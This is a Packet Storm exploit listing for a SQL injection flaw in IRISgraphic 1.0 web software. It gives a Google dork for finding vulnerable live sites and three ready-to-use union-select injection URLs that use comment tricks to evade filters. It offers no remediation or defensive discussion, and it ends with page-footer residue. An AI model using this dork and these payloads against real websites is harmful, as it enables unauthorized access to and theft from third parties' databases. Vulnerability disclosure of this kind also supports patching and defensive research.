IRISgraphic version 1.0 suffers from a remote SQL injection vulnerability.
07db1c2a33207322fd3a20d25d61369153fb9feaab4405e471dc75abb7f14adf# Exploit Title: IRISgraphic sql injection
# Google Dork: "Powered by www.IRISgraphic.com"
# Date: 2020.03.07
# Exploit Author: Milad Karimi
# Vendor Homepage: http://www.irisgraphic.com/
# Software Link: http://www.irisgraphic.com/
# Category : webapps
# Version: 1.0
# Tested on: windows 10 , firefox
# CVE : CWE-89
################################################
proof of concept :
Sql Injection Vulnerability
1- search google Dork : "Powered by www.IRISgraphic.com"
2- sql injection
demo
http://site/kbe-lb/news.php?id=13/*!50000union*/%20select%201,2,3,4,5
https://site/products.php?brand_id=2&&category_id=-36/*!50000union*/%20select%201,2,3,4%23
http://site/alfazone/gallery-slider.php?id=5/*!50000union*/%20select%201%23
#Discovered by : Milad Karimi
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed